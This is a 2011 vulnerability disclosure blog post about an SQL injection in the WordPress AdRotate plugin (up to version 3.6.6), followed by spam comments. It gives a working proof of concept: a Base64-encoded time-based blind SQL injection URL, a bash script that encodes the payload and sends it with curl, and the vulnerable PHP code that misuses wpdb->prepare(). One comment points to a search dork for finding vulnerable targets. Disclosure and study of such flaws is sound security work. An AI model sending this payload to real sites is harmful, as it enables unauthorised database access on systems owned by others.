Paths of an uncon(s)cious mind: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability

Monday, November 14, 2011

WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability

# Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability
# Date: 2011-11-8
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip
# Version: 3.6.6 (tested)
# Note: parameter $_GET["track"] has to be Base64 encoded

---
PoC
---
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EI
DE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpK
SksMCkj

e.g.
#!/bin/bash
payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
#"
encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,
112))),0)#" | base64 -w 0`
curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$enc
oded

---------------
Vulnerable code
---------------

if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = base64_decode($_GET['track']);
    ...
    list($ad, $group, $block) = explode("-", $meta);
    ...
    $bannerurl = $wpdb->get_var($wpdb->prepare("SELECT `link` FROM `".$prefix."a
drotate` WHERE `id` = '".$ad."' LIMIT 1;")); //wrong (mis)usage of wpdb->prepare
()

p.s. tried to contact author and WordPress team but without any luck

14 comments:

Mayannk Koomar said...: Reading is my passion. Browsing through your site gives me a lot of knowledge in so many ways. Thank you for the efforts you made in writing and sharing your points of view.

Looking forward to learn some more from you.

Wordpress Customization Service

Keep it up.; December 29, 2011 at 11:50 AM
Restaurant Brugge said...: thanks 4 sharing this post with us; March 2, 2012 at 8:14 AM
Restaurant Bruges said...: nice post i really enjoyed reading it a lot; March 6, 2012 at 7:10 AM
Silver Jewelry Jaipur said...: awesome and fantastic post really like it a lot; March 6, 2012 at 7:13 AM
Silver Jewelry Jaipur said...: awesome and fantastic post really like it a lot; March 6, 2012 at 7:14 AM
finance managment tips said...: great work done by you keep doing this type of work; March 6, 2012 at 7:15 AM
property dealer in delhi said...: good job i like it; March 7, 2012 at 9:07 AM
buy saheli contraceptive pill said...: Really amazing post...; September 24, 2012 at 11:38 AM
Durex Jeans Condoms said...: thanks 4 sharing this post with us; October 25, 2012 at 9:44 AM
Anonymous said...: Hi to all, the contents present at this web page
are genuinely remarkable for people knowledge, well,
keep up the nice work fellows.
Also visit my web blog : 500 Facebook Fans; January 17, 2013 at 12:50 PM
Anonymous said...: Is this vulnerability still not fixed? Google search for inurl:adrotate-out.php yields lots of targets 0.o Wordpress needs to do something about this.; February 25, 2013 at 8:39 PM
Anonymous said...: Good day! This is my 1st comment here so I just wanted to give a quick shout out and say I truly enjoy
reading through your posts. Can you suggest any other blogs/websites/forums that cover the same
topics? Thank you so much!

My web page; bacode rental; March 2, 2013 at 3:38 PM
Anonymous said...: I know this if off topic but I'm looking into starting my own blog and was wondering what all is needed to get set up? I'm assuming having a blog like yours would
cost a pretty penny? I'm not very web smart so I'm not 100% sure. Any suggestions or advice would be greatly appreciated. Kudos

Here is my webpage - rent bar code scanner
My site > rent barcode scanner; March 11, 2013 at 9:34 AM
Anonymous said...: To a sure extent, this fact is and what is fiction? [url=http://www.onlinecasinoburger.co.uk/]online casino uk[/url] online casino uk This city is not real $8.5; tables,$7.3, up 1 percent. http://www.onlinecasinoburger.co.uk/; March 27, 2013 at 11:16 AM